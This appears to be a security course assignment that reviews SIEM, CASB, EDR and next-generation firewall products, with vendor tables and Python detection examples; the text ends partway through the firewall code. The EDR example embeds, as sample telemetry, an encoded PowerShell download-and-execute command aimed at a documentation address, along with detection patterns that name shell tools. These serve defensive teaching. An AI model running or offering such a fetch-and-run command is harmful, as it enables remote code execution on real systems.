Ethical hacking class assignment
Overall Security Process Review CISC 662
Agenda
Review of the following technologies and current products:
SIEM
CASB
EDR (Endpoint Detection and Response)
NGFW (Next Generation Firewalls)
Threat Intelligence
Summary of Term
SANS Technology Institute - Candidate for Master of Science Degree
What is a SIEM?
SIEM - Security Information and Event Management
Logging and Event Aggregation
Network (router,switch,firewall,etc)
System (Server,workstation,etc)
Application (Web, DB )
Correlation Engine
2+ related events = higher alarm (1+1=3)
At first glance, SIEM appliances and software look like event aggregators. Aggregating logs is useful, but what sets a SIEM apart from the event-aggregator market is the correlation engine.
The correlation engine can uncover threats and attacks across multiple related events that, taken individually, would not be cause for alarm.
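A concrete illustration of the "1+1=3" idea, added here as an example (it is not code from the deck or from any SIEM vendor): a small correlation engine in Python that normalises constructed log lines from a firewall, sshd and auditd, then chains three stateful rules. The source addresses, user names, thresholds and time windows are assumptions.

```python
"""SIEM-style correlation: events that are harmless alone, alarming together.

Added example, not from the original deck or any vendor product. The log lines
below are constructed; the IPs are documentation ranges, not real hosts.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (time | source | message). Not from a real system.
SAMPLE_LOG = """\
2024-03-01T08:00:01 firewall DENY src=203.0.113.7 dst=10.0.0.5 dport=22
2024-03-01T08:00:02 firewall DENY src=203.0.113.7 dst=10.0.0.5 dport=23
2024-03-01T08:00:03 firewall DENY src=203.0.113.7 dst=10.0.0.5 dport=445
2024-03-01T08:01:10 sshd Failed password for admin from 203.0.113.7
2024-03-01T08:01:12 sshd Failed password for admin from 203.0.113.7
2024-03-01T08:01:14 sshd Failed password for admin from 203.0.113.7
2024-03-01T08:01:15 sshd Failed password for admin from 203.0.113.7
2024-03-01T08:01:20 sshd Accepted password for admin from 203.0.113.7
2024-03-01T08:02:05 auditd useradd name=backup_svc by=admin
2024-03-01T09:30:00 sshd Failed password for bob from 198.51.100.9
2024-03-01T09:30:40 sshd Accepted password for bob from 198.51.100.9
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<source>\S+)\s+(?P<msg>.+)$")
# Normalisation: map each raw message onto an event type with named fields.
PATTERNS = [
    ("fw_deny", re.compile(r"DENY src=(?P<ip>[\d.]+) dst=\S+ dport=(?P<port>\d+)")),
    ("auth_fail", re.compile(r"Failed password for (?P<user>\S+) from (?P<ip>[\d.]+)")),
    ("auth_success", re.compile(r"Accepted password for (?P<user>\S+) from (?P<ip>[\d.]+)")),
    ("user_created", re.compile(r"useradd name=(?P<name>\S+) by=(?P<user>\S+)")),
]


def parse(log_text):
    """Turn raw lines into normalised events sorted by time."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for etype, pat in PATTERNS:
            pm = pat.search(m["msg"])
            if pm:
                ev = {"ts": datetime.fromisoformat(m["ts"]), "type": etype}
                ev.update(pm.groupdict())
                events.append(ev)
                break
    return sorted(events, key=lambda e: e["ts"])


def correlate(log_text, fail_threshold=3, window=timedelta(minutes=5)):
    """Apply three stateful rules; later rules build on earlier matches."""
    alerts = []
    denies = defaultdict(list)       # ip -> [(ts, dport)]
    fails = defaultdict(list)        # ip -> [ts]
    suspicious_logins = {}           # user -> ts of brute-forced login
    scanned = set()

    for ev in parse(log_text):
        t = ev["ts"]
        if ev["type"] == "fw_deny":
            # Rule 1: >= 3 distinct ports denied from one source within a minute.
            denies[ev["ip"]].append((t, ev["port"]))
            recent_ports = {p for ts, p in denies[ev["ip"]] if t - ts <= timedelta(minutes=1)}
            if len(recent_ports) >= 3 and ev["ip"] not in scanned:
                scanned.add(ev["ip"])
                alerts.append({"rule": "port_scan", "severity": "MEDIUM", "ip": ev["ip"], "ts": t})
        elif ev["type"] == "auth_fail":
            fails[ev["ip"]].append(t)
        elif ev["type"] == "auth_success":
            # Rule 2: a success preceded by >= fail_threshold failures in the window.
            recent = [ts for ts in fails[ev["ip"]] if t - ts <= window]
            if len(recent) >= fail_threshold:
                alerts.append({"rule": "brute_force_success", "severity": "HIGH",
                               "ip": ev["ip"], "user": ev["user"], "ts": t})
                suspicious_logins[ev["user"]] = t
        elif ev["type"] == "user_created":
            # Rule 3: account creation shortly after a brute-forced login.
            when = suspicious_logins.get(ev["user"])
            if when is not None and t - when <= timedelta(minutes=10):
                alerts.append({"rule": "account_created_after_suspicious_login", "severity": "CRITICAL",
                               "user": ev["user"], "new_account": ev["name"], "ts": t})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(a["severity"], a["rule"], {k: v for k, v in a.items() if k not in ("rule", "severity")})
```

Run it and the three alerts come out in escalating order. A single DENY, or bob's one failed login followed by a success, never fires anything; that is the difference between per-event alerting and correlation.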
SIEM
What is a SIEM?
Security information and event management (SIEM) is the technology that can tie all your systems together and give you a comprehensive view of IT security.
IT security is typically a patchwork of technologies – firewalls, intrusion prevention, endpoint protection, threat intelligence and the like – that work together to protect an organization’s network and data from hackers and other threats. Tying all those disparate systems together is another challenge, however, and that’s where SIEM can help.
SIEM systems manage and make sense of security logs from all kinds of devices and carry out a range of functions, including spotting threats, preventing breaches before they occur, detecting breaches, and providing forensic information to determine how a security incident occurred as well as its possible impact.
Using SIEM
How do SIEM Products help the following Security concerns?
Countermeasures to detect attempts to infect internal system
Identification of infected systems trying to exfiltrate information
Mitigation of the impact of infected systems
Detection of outbound sensitive information ( DLP)
These questions are a core part of a company's overall security architecture. If a SIEM isn't providing answers or solutions to them, what is it doing?
If you aren't using your SIEM to solve issues like these, it may just be an expensive log collection system sitting on your network collecting dust.
SIEM Advantages
Correlation of data from multiple systems and from different events detecting security and operational conditions
Anomaly detection by using a baseline of events over time to find deviations from expected or normal behavior
Comprehensive view into an environment based on event types, protocols, log sources, etc
APT (advanced persistent threat) detection through protocol and application anomalies
Prioritization based on the risk a threat poses to assets, so staff can triage the most vulnerable targets first
Alerting and monitoring on events of interest to escalate priority
Ability to filter events and create custom views to meet business needs
Allows organizations to demonstrate adherence to policies and controls
Monitor and log the access and use of sensitive data
Limits exposure to breach disclosure costs by knowing the number of customer records affected
Helps reduce risk to business partners and customers by detecting data loss and fraud
Reduce costs by replacing redundant functions and technologies
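The anomaly-detection and risk-prioritization bullets above, and the earlier question about identifying infected systems trying to exfiltrate data, come down to one mechanism: build a per-asset baseline, score today's deviation from it, and weight the score by asset criticality. The Python below is an added example, not from the deck or any SIEM vendor; the host names, daily volumes and risk scores are constructed.

```python
"""Baseline-and-deviation detection with asset-risk prioritisation.

Added example, not from the deck or any SIEM vendor. Host names, volumes and
risk scores are constructed.
"""
import statistics

# Outbound megabytes per host per day over the prior 14 days (constructed).
BASELINE_MB = {
    "ws-finance-07": [210, 195, 230, 205, 220, 198, 215, 225, 200, 210, 190, 230, 205, 215],
    "ws-eng-12": [900, 1100, 950, 1000, 1050, 980, 1020, 990, 1010, 1030, 960, 1000, 1040, 970],
    "srv-backup-01": [50000, 51000, 49500, 50200, 50800, 49900, 50100, 50300,
                      49700, 50400, 50000, 50600, 49800, 50100],
}
# Today's outbound volume per host (constructed): the finance workstation is the outlier.
TODAY_MB = {"ws-finance-07": 4800, "ws-eng-12": 1060, "srv-backup-01": 50300}
# Asset criticality 1..10 as an asset inventory might assign it (constructed).
ASSET_RISK = {"ws-finance-07": 8, "ws-eng-12": 4, "srv-backup-01": 6}


def zscore(history, value):
    """Standard score of `value` against the host's own history."""
    mean = statistics.mean(history)
    stdev = statistics.stdev(history) if len(history) > 1 else 0.0
    # Floor the spread: a perfectly flat baseline must not turn into a divide-by-zero,
    # and a 1% floor keeps noisy, high-volume hosts (backup server) from alerting on jitter.
    stdev = max(stdev, 0.01 * mean, 1e-9)
    return (value - mean) / stdev


def detect_anomalies(baseline, today, asset_risk, z_threshold=3.0):
    """Return hosts whose volume deviates by more than z_threshold, highest priority first."""
    findings = []
    for host, history in baseline.items():
        if host not in today:
            continue
        z = zscore(history, today[host])
        if z > z_threshold:
            findings.append({
                "host": host,
                "today_mb": today[host],
                "baseline_mean_mb": round(statistics.mean(history), 1),
                "z": round(z, 1),
                "priority": round(z * asset_risk.get(host, 1), 1),  # deviation x criticality
            })
    return sorted(findings, key=lambda f: f["priority"], reverse=True)


if __name__ == "__main__":
    for f in detect_anomalies(BASELINE_MB, TODAY_MB, ASSET_RISK):
        print(f)
```

Only the finance workstation is reported: its 4.8 GB day is hundreds of standard deviations above its own ~210 MB baseline, while the backup server's 50 GB is normal for that host. Baselining per asset, rather than a single global threshold, is what makes the backup server quiet and the workstation loud.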
Almost all SIEM Vendors try to satisfy these common advantages.
Vendor Approaches
LogRhythm (http://logrhythm.com/)
QRadar (http://www.q1labs.com/)
Prism Microsystems (http://www.prismmicrosys.com/)
NitroSecurity (http://nitrosecurity.com/)
LogRhythm
Audit privileged user activity such as new account creation for greater operational transparency
Correlate privileged user behavior with specific network activity
View real-time activity and drill down based on relevant criteria
Map global relationships to identify communication involving suspicious sources and/or destinations
Visualize network communication to identify anomalous patterns and data transfers
Deliver real-time alerts on unauthorized access of sensitive data and information transfers to unapproved recipients
Independently audit and log data transfer to removable media such as USB drives and memory cards
Correlate access of sensitive data with printer logs and user activity
Independently monitor processes for increased awareness of potential malware and spyware
QRadar
Hardened, Linux-based appliance solution
Integrated flow collection enables passive profiling of network assets, applying context rules to discovered assets
Integration of external VA scanner results applies further context to rules, and weights to incidents
Trend analysis and anomaly detection for detecting statistical anomalies and threshold violations
Ability to spot problems based on historical trends and current activity
Increased forensics by combining fully integrated network activity with log data
Agentless collection for most log sources, including Windows; Q1 Labs provides an optional Windows agent (ALE) that reads event data and has plug-ins for sources such as IIS and SQL Server
Geo-location ability: find traffic location based on IP address
Product ships with 120 standard correlation rules and 1,600 out-of-the-box report templates; adding site- or industry-specific rules is easy
Company auto-updates rules with every major release of QRadar
Correlation rule editor is simple to use; it resembles Microsoft Outlook's rules wizard
Appliance has a distributed database (ARIEL) that excels at write-once, read-many workloads and grows incrementally as you add QRadar appliances; this eliminates a separate backend database and enables efficient high availability
Segregation of duties based on job responsibility and business need
Reports are single-pane view containing all relevant information for reporting and investigation
Prism Microsystems
Software-only solution running on Windows
No database; log data is stored in compressed CAB files with SHA-1 integrity hashes and about 92% raw-log compression
Integrates with the current Active Directory environment; monitors logs from major vendors
Indexed search with custom keywords
Allows central management and deployment; monitors business-critical components
Database monitoring for MS SQL, Oracle, and others via ODBC
Point-and-click design of reports
Provides high-level dashboards down to low-level detail
Optional agents for Windows, Solaris BSM, IBM iSeries and AS/400
Windows agent features:
central management and deployment capability
monitors USB drives, application logs, network connections, processes, change audits and configuration assessments
NitroSecurity
Fast database, from high-level summaries down to packet-level detail
No DBA management required
"Single pane of glass" GUI
Regular expression rules engine
Multiple filtering options
Passive database monitoring
Auto discover feature to find "rogue" database instances
Resolves "pooled" connections for applications
Geo-location tracking
Linux-based appliance, FIPS 140-2 and Common Criteria EAL 3 certified
Top SIEM Vendors
| VENDOR/PRODUCT | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
|---|---|---|---|---|---|
| Micro Focus (HP) ArcSight | Enterprises | 350+ data sources, 75,000 events per second (EPS) | Integrates with machine learning, intelligence platforms | Appliance, software or cloud | Based on data ingested and events per second (EPS) |
| Splunk Enterprise Security | Highly regulated industries | Most users ingest several petabytes daily | Integrates with Splunk UBA & machine learning toolkit | Software or cloud | Based on max daily data volume; starts at $1,800/GB/day |
| IBM Security QRadar | Enterprises and regulated industries | 400+ sources, scales to millions of events per second | UBA, forensics, packet inspection, Watson integration | Cloud or hardware, software or virtual appliance | Cloud starts at $800/month; on-premises at $10,400 |
| AlienVault Unified Security Management | Lower-cost option for on-premises or AWS | Up to 15,000 EPS | Global network sharing 1 million threats daily | Cloud or virtual or hardware appliance | Lower-cost open-source-based product |
| LogRhythm | Scales from midrange to enterprise | Highly scalable decentralized architecture | Machine analytics for advanced threats | Appliance, software or virtual instance | Subscription pricing tied to volume consumption |
| McAfee Enterprise Security Manager | Support for public sector, education and healthcare | 50,000+ events per second, billions of events stored | Automated task and policy changes | Physical or virtual appliance | Based on EPS capacity, starting at $39,995 |
| Micro Focus Sentinel Enterprise | MSSPs and distributed enterprises | Event taxonomy comprises more than 200 fields | Integrates with NetIQ technologies | Software or virtual appliance | Based on EPS and per device |
| SolarWinds Log & Event Manager | Security teams looking for an easy, lower-cost solution | Up to 250 million events per day | Thresholds can be set for abnormal behavior | Virtual appliance | Starts at $4,495 for 30 nodes |
| Trustwave SIEM Enterprise | Mid-market and enterprise | Millions of daily events | Analytics and threat intelligence from SpiderLabs | Appliance, software or managed service | Subscription or fee-based consulting |
| RSA NetWitness | Financial, government, energy, telecoms | 30,000 EPS, 10 Gbps & 100,000 endpoints per scalable system | Streaming analytics, machine learning, automation | On-premises, virtual, cloud and hybrid options | Based on throughput per 50 GB of logs and 1 TB of packets |
CASB
Cloud Access Security Broker (CASB)
Intent
CASBs are security enforcement points placed between consumers and service providers that apply security controls when cloud services, usually SaaS, are accessed. They may also control access to internal company resources. Security controls may include authentication (credentials and passwords), authorization policy enforcement, intrusion prevention, anti-malware filters, security logging/auditing, and encryption.
Solution idea
Class diagram of CASB (figure not reproduced; diagram label: "Cloud Space")
Solution
Consumers (users) request services through the Broker, which in turn obtains them from one of the Service Providers.
The Broker includes a set of security mechanisms such as a SecurityLogger/Auditor, an Authorizer, an Authenticator, an Encryptor, and possibly others.
Consumers and CASBs can be mutually authenticated. The CASB enforces rights for the consumers when they try to access an application. InternalResources (applications) can also be controlled by the CASB. An Identity Federation provides identifiers across consumers and SPs.
CASB and deployment modes
| Capability | Log collection | Forward Proxy | Reverse Proxy | API |
|---|---|---|---|---|
| Employee monitoring | x | | | |
| Risk profiling | x | | | |
| Security gap detection | x | | | |
| Group activity analytics | x | | | |
| Activity monitoring | x | x | x | x |
| Detect insider threats | x | x | x | x |
| Detect compromised accounts | x | x | | |
| DLP | x (transit) | x (transit) | x (inspection) | |
| Malware | x (exfil) | x (stored in system) | | |
| Encryption | x | x | x | |
| Configuration management | x | x | | |
| Access management | x | x | x | |
| DRM | x | x | | |
| Decryption | x | x | | |
Sanctioned or unsanctioned apps
Users – on-network or off-network
Devices – managed or unmanaged
Data – at rest or in motion
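How the Broker's Authenticator, Authorizer, SecurityLogger/Auditor and DLP pieces fit together, and how the dimensions just listed (sanctioned or unsanctioned app, managed or unmanaged device, data in motion) feed the decision, as an added Python example that is not the pattern's or any vendor's code. The session tokens stand in for an identity federation; the user groups, the app catalogue and the card-number DLP rule are constructed.

```python
"""A toy CASB broker: authenticate, authorise, apply DLP, log every decision.

Added example; not the deck's or any vendor's code. Tokens, users, groups and
the sanctioned-app list are constructed stand-ins for an identity federation
and an application catalogue.
"""
import re
from dataclasses import dataclass, field

SESSION_TOKENS = {"tok-alice": "alice", "tok-bob": "bob"}            # constructed
USER_GROUPS = {"alice": {"finance"}, "bob": {"engineering"}}          # constructed
SANCTIONED_APPS = {"corp-drive": {"finance", "engineering"},           # app -> groups entitled
                   "corp-crm": {"finance"}}
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")


def luhn_ok(digits):
    """Luhn checksum, so a random 16-digit order number is not a DLP hit."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def contains_card_number(text):
    """DLP check: a 13-16 digit run (spaces/dashes allowed) that also passes Luhn."""
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"\D", "", m.group())
        if 13 <= len(digits) <= 16 and luhn_ok(digits):
            return True
    return False


@dataclass
class Request:
    token: str
    app: str
    action: str            # "view" | "upload" | "download"
    managed_device: bool
    body: str = ""


@dataclass
class Broker:
    audit: list = field(default_factory=list)       # SecurityLogger/Auditor

    def _record(self, req, user, verdict, reason):
        self.audit.append({"user": user, "app": req.app, "action": req.action,
                           "managed": req.managed_device, "verdict": verdict, "reason": reason})
        return verdict

    def decide(self, req):
        user = SESSION_TOKENS.get(req.token)                          # Authenticator
        if user is None:
            return self._record(req, None, "DENY", "authentication failed")
        entitled_groups = SANCTIONED_APPS.get(req.app)
        if entitled_groups is None:                                   # unsanctioned app (shadow IT)
            return self._record(req, user, "DENY", "unsanctioned app")
        if not USER_GROUPS.get(user, set()) & entitled_groups:        # Authorizer
            return self._record(req, user, "DENY", "user not entitled to app")
        if req.action == "upload" and contains_card_number(req.body):  # DLP on data in motion
            if not req.managed_device:
                return self._record(req, user, "DENY", "sensitive data from unmanaged device")
            return self._record(req, user, "ALLOW", "sensitive data upload logged")
        if req.action == "download" and not req.managed_device:       # DRM-style control
            return self._record(req, user, "ALLOW_WATERMARKED", "download to unmanaged device")
        return self._record(req, user, "ALLOW", "policy default")
```

Every branch writes an audit record before returning, so the log-collection use cases in the table (employee monitoring, risk profiling) are fed by the same code path that enforces policy in proxy mode. The unmanaged-device checks are the reason proxy deployments need device posture from somewhere; an API-only deployment sees the file after it has landed and can only remediate, not block.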
Use case "Access an application service" (sequence diagram not reproduced; its labels are RP, FP, API and log, i.e. the reverse proxy, forward proxy, API and log-collection modes from the table above)
Known uses
Adallom [Ada15]—integrates with the authentication services in SaaS to let institutions monitor the activities of users in any location and any device. This product includes a behavior analysis component to assess the possible risk of specific transactions.
Bitglass [Bit]—provides RBAC, encryption, session control, identity, and DRM.
CipherCloud [Cip]—protection controls include encryption, tokenization, monitoring, data loss prevention, and malware detection.
Elastica Cloudsoc [Ela15]—Provides authentication, authorization, monitoring, and other services. It can interact with third-party APIs.
Skyhigh Networks [Sky]—includes encryption, logging/auditing, access control, and anomaly detection (IDS). It also provides risk ratings of cloud services. Integrates authentication with standards such as SAML.
IBM (http://www-03.ibm.com/security/cloud/cloud-security-enforcer.html)
Top CASB vendors
| VENDOR | USE CASES | FEATURES | TECHNOLOGY | DELIVERY | PRICING |
|---|---|---|---|---|---|
| Forcepoint | Large to very large enterprises | Deep support for top cloud applications, with ability to support many more | API, proxy and hybrid | Cloud | Subscription based on number of users, plus options like governance and audit |
| Skyhigh Networks | Mid to large enterprises | Threat protection and DLP; dedicated GDPR offering | Combination of API and proxy depending on use case | Cloud, software or appliance | Priced on per-user, per-year basis |
| Cisco Systems | Organizations with 1,000+ employees | Microservices exposed via APIs can support home-grown apps | API | Cloud | Priced on number of apps and users |
| Microsoft | Small and mid-sized companies | Deep integration with Microsoft security and Office 365 | API, with in-session proxy control | Cloud | $5 a month per user; also part of Microsoft Mobility + Security |
| Bitglass | Small through large enterprises | Integrated IAM; agentless support for any app or device | Hybrid | Cloud | Priced per user per month |
| Netskope | Enterprises | Covers thousands of cloud services; DLP and threat analytics | API, proxy and hybrid | Cloud, appliance or both | Priced per user per year |
EDR
EDR Explained
Endpoint detection and response (EDR) platforms are a category of endpoint security tools, built to provide endpoint visibility, and are used to detect and respond to cyber threats and exploits.
Gartner analyst Anton Chuvakin coined the term in 2013 for tools that are primarily focused on detecting and investigating suspicious activities (and traces of such) on hosts/endpoints.
Endpoint data has a clear advantage for protecting against advanced threats: endpoints are where attacker activity takes place, so they provide an accurate, first-hand view of an intrusion as it unfolds.
Endpoints provide critical forensic information including process actions, file access, network events and endpoint configuration changes.
EDR platforms were built to provide comprehensive visibility into endpoints and servers, monitor behaviors, and spot abnormal behavior indicative of malicious activity. By continuously monitoring and analyzing endpoint activity, EDR tools enable detection of and response to attacks that have slipped past other protective controls.
EDR Functions
They enable detection
They cross-correlate data across the whole environment
They combine whitelisting and blacklisting with behavioral analysis
They are able to observe endpoint activity without interfering
They empower IR and forensics investigation
They enable effective cleanup and remediation
They work with your antivirus
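What "monitor behaviors and spot abnormal behaviors" looks like on process telemetry, as an added example that is not from the deck or any EDR vendor: constructed Sysmon-like process-creation events, an ancestry chain for the investigator, and two behavioral rules (an Office application spawning a shell, and PowerShell run with an encoded command, which the rule decodes for the analyst). The host, user, file paths, the encoded payload and its URL are made up.

```python
"""EDR-style behavioural detection over endpoint process-creation telemetry.

Added example, not from the deck or any EDR product. Events are constructed in
a Sysmon-like shape (pid, ppid, image, cmdline, user); user, paths and the
encoded payload are made up and the URL uses a documentation address.
"""
import base64
import re

# Constructed payload for the encoded-PowerShell event.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/a.ps1')".encode("utf-16le")
).decode()

EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe", "user": "CORP\\alice"},
    {"pid": 200, "ppid": 100, "image": "outlook.exe", "cmdline": "outlook.exe", "user": "CORP\\alice"},
    {"pid": 300, "ppid": 200, "image": "winword.exe",
     "cmdline": 'winword.exe "C:\\Users\\alice\\Downloads\\invoice.docm"', "user": "CORP\\alice"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {_ENCODED}", "user": "CORP\\alice"},
    # Benign admin use of PowerShell from the desktop: must not alert.
    {"pid": 500, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1", "user": "CORP\\alice"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts -ec and any unambiguous prefix of -EncodedCommand; catch all of them.
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    for flag, blob in ENC_FLAG_RE.findall(cmdline):
        flag = flag.lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def process_chain(events, pid):
    """Ancestry from root to `pid`, e.g. explorer -> outlook -> winword -> powershell."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def analyze(events):
    """Apply behavioural rules to each process-creation event."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        common = {"pid": ev["pid"], "user": ev["user"], "chain": process_chain(events, ev["pid"])}
        # Rule 1: a document-handling application launching a script host or shell.
        if ev["image"] in SHELLS and parent and parent["image"] in OFFICE_APPS:
            alerts.append({**common, "rule": "office_spawns_shell", "parent": parent["image"]})
        # Rule 2: encoded PowerShell; decode it so the analyst sees the real command.
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            alerts.append({**common, "rule": "encoded_powershell", "decoded": decoded})
    return alerts


if __name__ == "__main__":
    for a in analyze(EVENTS):
        print(a["rule"], " -> ".join(a["chain"]), a.get("decoded", ""))
```

The backup script from explorer.exe trips neither rule, which is the whitelisting-plus-behavior point from the list above: powershell.exe itself is not the signal, its parent and its arguments are. The ancestry chain is what the investigator needs for response, since it points back to the document and the mail client that delivered it.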
Top EDR Solutions - 1
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
|---|---|---|---|---|---|
| FireEye | From 250 to 300,000 endpoints; cloud for SMBs | 1,000+ researchers; 1,000 Mbps throughput | Automated threat detection and prevention for known and unknown threats | Cloud or appliance | Starts at $30 per endpoint, plus intelligence feeds and appliance costs |
| Carbon Black | All markets and sizes, but strongest in high-risk industries | Up to 150,000 endpoints per cluster, with unlimited clusters | Defense Cloud analytics engine identifies malicious activity | Software or cloud | Starts at $30 per endpoint per year |
| Guidance Software | Large organizations | Can scale to hundreds of thousands of nodes | Automated alert response, validation, triage and incident response | Software | Starts at $57,995 for up to 2,000 nodes on a perpetual license |
| Cybereason | Organizations of any size or vertical with little security talent | Can render 8 million questions per second with unlimited scalability | Machine learning and analytics | Cloud or on-premises | Starts at $50 per endpoint before volume discounting |
| Symantec Endpoint Protection with EDR | Boasts 25% of all deployments worldwide and 350,000 customers | Scales to hundreds of thousands of endpoints | AI and world's largest threat intelligence network | Physical or virtual appliance | Starts at $40 per seat per year |
Top EDR Solutions - 2
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
|---|---|---|---|---|---|
| RSA NetWitness Endpoint | Strongest in finance, healthcare, government, energy, telcos | More than 300 behavioral indicators can be customized | Behavioral-based analytics engine and machine learning | Agents deployed across multiple form factors; management console on-premises | Pricing on a per-endpoint basis |
| Cisco AMP for Endpoints | Strong in high-risk verticals | Top score from NSS Labs; 20 billion threats blocked per day | Adaptive intelligence, automated detection and response | Cloud, private cloud, or on-premises appliance | Pricing is based on length of subscription and number of endpoints |
| Tanium | Large organizations | Millions of endpoints and 15-second visibility across all endpoints | Automation workflows for data collection and corrective actions | Appliance, virtual machine, or standalone server | Company doesn't disclose pricing |
| CrowdStrike | Large organizations | More than 30 billion events per day from millions of sensors across 176 countries | APIs and feeds for integration with SIEM, IDS, and threat intelligence platforms | Cloud | Subscription-based pricing |
| CounterTack | From SMBs to enterprises | Can complete billions of scans per second | Via a strategic partnership with SAP | Platform or cloud | $14,000 per perpetual seat; $7,500 annual subscription seat |
Next Generation Firewalls (NGFWs)
Firewalls
Firewalls are a standard security tool for the majority of companies, but in today's changing threat landscape a firewall that only filters on ports and protocols no longer provides adequate protection; that is the gap next generation firewalls are meant to close.
A DEFINITION OF NEXT GENERATION FIREWALL
A next generation firewall (NGFW) is, as Gartner defines it, a:
“deep-packet inspection firewall that moves beyond port/protocol inspection and blocking to add application-level inspection, intrusion prevention, and bringing intelligence from outside the firewall.”
TRADITIONAL FIREWALLS VS. NEXT GENERATION FIREWALLS
Next generation firewalls are a more advanced version of the traditional firewall, and they offer the same benefits. Like regular firewalls, NGFWs use both static and stateful (dynamic) packet filtering and VPN support to ensure that connections between the network, the internet, and the firewall are valid and secure. Both firewall types should also be able to perform network and port address translation (NAT/PAT) to map internal addresses to external ones.
There are also fundamental differences between the traditional firewall and next generation firewalls. The most obvious is an NGFW's ability to filter packets based on the application, not just the port. These firewalls have extensive control over and visibility into applications, which they identify through traffic analysis and signature matching. They can use application whitelists or a signature-based IPS to distinguish between safe applications and unwanted ones, and they can decrypt SSL/TLS traffic so that encrypted sessions can be inspected as well. Unlike most traditional firewalls, NGFWs also include a path through which future signature and threat-intelligence updates are received.
NGFW Benefits
NGFWs can block malware before it enters the network
They are better equipped to address Advanced Persistent Threats (APTs)
NGFWs can be a low-cost option for companies looking to improve their basic security because they consolidate the work of antivirus, firewall and other security products into one solution
They provide application awareness and inspection services, as well as intrusion prevention and visibility tools
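The port/protocol-versus-application distinction above, as an added example that is not from the deck or any firewall vendor: identifying the application from the first bytes of a flow, reading the server name (SNI) out of a TLS ClientHello, and deciding on that rather than on the destination port. The host names, the blocked-category list and the ClientHello builder (which exists only so the parser has realistic input) are constructed.

```python
"""Application identification independent of port, the core NGFW difference.

Added example, not from the deck or any firewall vendor. Payloads and host
names are constructed; the TLS ClientHello is built by a helper below so the
SNI parser has something realistic to read.
"""
import re
import struct

HTTP_RE = re.compile(rb"^(?:GET|POST|PUT|HEAD|DELETE|OPTIONS) \S+ HTTP/1\.[01]\r\n")
BLOCKED_HOSTS = {"files.example-share.test"}      # constructed "unsanctioned file sharing" category


def build_client_hello(sni):
    """Minimal TLS 1.2 ClientHello carrying one server_name extension (constructed input)."""
    name = sni.encode()
    entry = b"\x00" + struct.pack("!H", len(name)) + name          # name_type=host_name, length, name
    ext = struct.pack("!HH", 0, len(entry) + 2) + struct.pack("!H", len(entry)) + entry
    body = (b"\x03\x03" + b"\x11" * 32 + b"\x00"                    # version, random, empty session id
            + struct.pack("!H", 2) + b"\x13\x01"                     # one cipher suite
            + b"\x01\x00"                                            # null compression
            + struct.pack("!H", len(ext)) + ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def tls_sni(payload):
    """Extract the SNI host name from a ClientHello, or None if absent or malformed."""
    try:
        if payload[0] != 0x16 or payload[5] != 0x01:
            return None
        p = 9 + 2 + 32                                      # record+handshake headers, version, random
        p += 1 + payload[p]                                 # session id
        p += 2 + struct.unpack("!H", payload[p:p + 2])[0]   # cipher suites
        p += 1 + payload[p]                                 # compression methods
        end = p + 2 + struct.unpack("!H", payload[p:p + 2])[0]
        p += 2
        while p + 4 <= end:
            etype, elen = struct.unpack("!HH", payload[p:p + 4])
            p += 4
            if etype == 0:                                  # server_name: list_len(2) type(1) len(2) name
                name_len = struct.unpack("!H", payload[p + 3:p + 5])[0]
                return payload[p + 5:p + 5 + name_len].decode("ascii")
            p += elen
    except (IndexError, struct.error, UnicodeDecodeError):
        return None
    return None


def identify(payload):
    """Return (application, host-or-None) from the first bytes of a flow."""
    if payload.startswith(b"SSH-2.0-"):
        return "ssh", None
    if HTTP_RE.match(payload):
        host = re.search(rb"\r\nHost: ([^\r\n]+)", payload, re.I)
        return "http", host.group(1).decode("ascii", "replace") if host else None
    if payload[:1] == b"\x16":
        return "tls", tls_sni(payload)
    return "unknown", None


def legacy_policy(dst_port):
    """Port-based rule set of a traditional firewall: allow 22, 80 and 443, deny the rest."""
    return "ALLOW" if dst_port in (22, 80, 443) else "DENY"


def ngfw_policy(dst_port, payload):
    """Decide on what the traffic actually is, not on the port it uses."""
    app, host = identify(payload)
    if app == "ssh" and dst_port != 22:
        return "DENY", f"ssh tunnelled over port {dst_port}"
    if app == "tls" and host in BLOCKED_HOSTS:
        return "DENY", f"blocked category host {host} (from SNI)"
    if app == "tls":
        return "DECRYPT_AND_INSPECT", f"tls to {host}"
    if app == "unknown":
        return "DENY", "unidentified application"
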